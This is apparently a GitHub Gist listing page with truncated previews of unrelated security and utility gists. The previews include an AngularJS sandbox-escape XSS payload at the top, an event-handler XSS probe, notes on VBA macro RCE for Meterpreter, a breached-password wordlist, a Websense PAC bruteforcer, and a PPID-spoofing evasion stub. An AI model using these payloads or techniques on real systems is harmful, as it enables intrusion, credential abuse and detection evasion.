{{7*7}}
'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
wdullaer
/ install.sh
Last active
April 3, 2025 19:08
Install Latest Docker and Docker-compose on Ubuntu
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Ask for the user password | |
| # Script only works if sudo caches the password for a few minutes | |
| sudo true | |
| # Install kernel extra's to enable docker aufs support | |
| # sudo apt-get -y install linux-image-extra-$(uname -r) | |
| # Add Docker PPA and install latest version | |
| # sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 36A1D7869245C8950F966E92D8576A8BA88D21E9 | |
| # sudo sh -c "echo deb https://get.docker.io/ubuntu docker main > /etc/apt/sources.list.d/docker.list" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| ## Decodes NTLM "Authenticate" HTTP-Header blobs. | |
| ## Reads the raw blob from stdin; prints out the contained metadata. | |
| ## Supports (auto-detects) Type 1, Type 2, and Type 3 messages. | |
| ## Based on the excellent protocol description from: | |
| ## <http://davenport.sourceforge.net/ntlm.html> | |
| ## with additional detail subsequently added from the official protocol spec: | |
| ## <http://msdn.microsoft.com/en-us/library/cc236621.aspx> | |
| ## |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <a onafterprint="console.log(244599)" onbeforeprint="console.log(309354)" onbeforeunload="console.log(879813)" onerror="console.log(949564)" onhashchange="console.log(575242)" onload="console.log(301053)" onmessage="console.log(976974)" onoffline="console.log(796090)" ononline="console.log(432638)" onpagehide="console.log(504345)" onpageshow="console.log(696619)" onpopstate="console.log(398418)" onresize="console.log(943097)" onstorage="console.log(882233)" onunload="console.log(929443)" onblur="console.log(932104)" onchange="console.log(102339)" oncontextmenu="console.log(761265)" onfocus="console.log(188946)" oninput="console.log(143653)" oninvalid="console.log(304208)" onreset="console.log(318472)" onsearch="console.log(778420)" onselect="console.log(942035)" onsubmit="console.log(603589)" onkeydown="console.log(650647)" onkeypress="console.log(579383)" onkeyup="console.log(821763)" onclick="console.log(284098)" ondblclick="console.log(477370)" ondrag="console.log(439095)" ondragend="console.log(546684)" o |
mgeeky
/ Various-Macro-Based-RCEs.md
Last active
March 13, 2025 09:47
Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine.
This is a note for myself describing various Visual Basic macros construction strategies that could be used for remote code execution via malicious Document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.
All of the below examples had been generated for using as a remote address: 192.168.56.101.
List:
- Page substiution macro for luring user to click Enable Content
- The Unicorn Powershell based payload
- http://stackoverflow.com/questions/804115 (
rebasevsmerge). - https://www.atlassian.com/git/tutorials/merging-vs-rebasing (
rebasevsmerge) - https://www.atlassian.com/git/tutorials/undoing-changes/ (
resetvscheckoutvsrevert) - http://stackoverflow.com/questions/2221658 (HEAD^ vs HEAD~) (See
git rev-parse) - http://stackoverflow.com/questions/292357 (
pullvsfetch) - http://stackoverflow.com/questions/39651 (
stashvsbranch) - http://stackoverflow.com/questions/8358035 (
resetvscheckoutvsrevert)
tuantmb
/ breachcompilation.txt
Created
December 26, 2017 16:22
1.4 billion password breach compilation wordlist
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| wordlist created from original 41G stash via: | |
| grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt | |
| Then, compressed with: | |
| 7z a breachcompilation.txt.7z breachcompilation.txt | |
| Size: |
tomnomnom
/ google-copy.js
Created
June 19, 2019 21:27
Bookmarklet to copy URLs from a Google search results page
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| javascript:d=document;b=d.createElement`textarea`;c=d.getSelection();b.textContent=[...d.querySelectorAll`div.r>a:first-child`].map(n=>n.href).join`\n`;d.body.appendChild(b);c.removeAllRanges();b.select();d.execCommand`copy`;d.body.removeChild(b) |
GarnetSunset
/ websenseBruteforce.py
Last active
October 7, 2024 20:03
Bruteforcing Websense to find unprotected pac files that can be used to get info about internal networks and exfiltration angles.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # GarnetSunset | |
| ## Websense bruteforcing script | |
| import requests | |
| import rstr | |
| regex = r"^(([b-df-hj-np-tv-z2346789]{8})\2?(?!\2))+$" | |
| pacUrl = "http://pac.webdefence.global.blackspider.com/proxy.pac?p=" | |
| success = open("successful.txt","a+") |
rasta-mouse
/ PPID Spoof & BlockDLLs
Last active
April 1, 2025 22:39
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| namespace BlockDllTest | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { |
OlderNewer